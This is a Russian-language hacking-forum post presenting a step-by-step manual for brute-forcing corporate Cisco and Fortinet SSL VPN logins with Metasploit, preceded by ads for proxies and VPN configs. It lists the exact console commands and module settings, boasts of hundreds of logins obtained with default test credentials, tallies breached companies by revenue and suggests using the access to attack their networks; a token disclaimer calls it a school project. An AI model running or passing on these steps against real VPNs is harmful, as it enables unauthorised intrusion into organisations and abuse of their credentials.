Загрузка...
Мануал по ****у корпоративных ***.
  1. ахуеть
    ахуеть Автор темы 28 май 2023 3580 1 июл 2019
    [IMG]
    1. Proxy - 10$ [Pia, 922, ABC, 9] - https://zelenka.guru/threads/6517233/
    2. *** Configs - 0.99$ [WireGuard, Outline] - https://zelenka.guru/threads/6751972/
    3. Proxy - 0.5$ [Socks5, Http(s)] - https://zelenka.guru/threads/6946368/
    4. *** Services - 0.35$ [AdGuard, Pia, Mullvad..] - https://zelenka.guru/threads/6862450/
    5. Telegram Premium - 17$ [GIFT] - https://zelenka.guru/threads/6725960/
    6. Почты - 0.002$ [FirstMail] - https://zelenka.guru/threads/6045558/


    :tg: @SnegirShop_bot



    Всем привет.
    Это краткий мануал по работе с корп. сетями, и ****у их ***ов.

    Добыча мата.

    Первое что нам понадобится это арендованный сервер чем быстрее, тем лучше.
    Для удобства работы желательно установить на серв внц или рдп клиент. Как это делать нагуглите сами в крайнем случае спросите у сапорта он вам все установит.
    (в кали все установлено по умолчанию), поэтому рекоменудю покупать дедик\впс сразу с кали, если есть такая возможность.

    Врываемся в наш арендованный сервер

    После врыва и установки всего что нам нужно, открываем консоль и пишем -
    systemctl start postgresql
    msfdb init
    msfconsole

    Жмем enter.

    [IMG]

    Мы запустили metasploit, наверняка все про него наслышаны уже много много раз, и что это, и для чего обьяснять смысла нету

    Далее прописываем по списку
    Для ****а Cisco SSL *** прописываем -
    use auxiliary/scanner/http/cisco_ssl_***

    set USERNAME берем рандомное часто встречающееся имя пользователя

    set PASSWORD указываем пароль

    set PASS_FILE указываем путь до файлика с дефолт паролями не более 3 штук

    set PASS_FILE – используем только в том случае если хотите меньше тратить
    времени на перезаходы на сервак для установки других параметров

    set THREADS 10

    set RHOSTS file: тут указываем файлик с ипами Cisco SSL ***

    пишем exploit, тычем ентер и забываем за сервак дня так на
    3 после завершения сканирования вводим команду сreds

    Сканирование не начинается сразу, а только через 30-50 мин

    Для того что бы показать в статье, как это работает, я понял что можно дать премию сисадминам огромных корпораций, ибо они оставили не закрытыми тестовые сети ***ов
    :peka:
    [IMG]

    Только по test – test у меня насканило 400 доступов по другим меньше


    форти *** пока не тестил но боюсь представить сколько выхлопа будет.
    auxiliary/scanner/http/fortinet_ssl_***
    модуль для форти, можете затестить его.

    Думаю, там сами разберетесь принцип тот же

    Итак, что мы имеем.
    Благодаря тупости сисадминов и оставленным дефолтным паролям, и тестовым учетным записям после чека всего материала статистика выглядит следующим образом:

    Всего айпи в скане: 300 000
    Открытые миллиардники USA: 15 шт
    Конторы от 50кк до 700кк : 230 шт
    Конторы с меньшей ревой либо не интересные госы итд: 155
    Конторка : ************
    Логин: test
    Пароль: test

    Далее использовать эти данные можно будет как и для условных атак на их сети имея в своём распоряжении уязвимости их сетей, или же просто для чека фортика(но статья не про это, отрабики и те кто хочет получить фри ***чик оаоаоа можете не читать)


    Всем удачи, всем пока. :kidrun:


    Всё написанное здесь, опубликовано только в исследовательских целях для проекта по теме "Интернет, и цифровая безопасность" за 11 класс. Автор статьи не пропогандирует ничего противозаконного, и не использовал это в корыстных целях.
     
    Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
    28 май 2023 Изменено
    1. Посмотреть предыдущие комментарии (3)
    2. Bob_Smuggler
    3. hwf0932
      ахуеть, как найти файл с ип cisco, который надо поставить в rhosts?

Комментарии

Top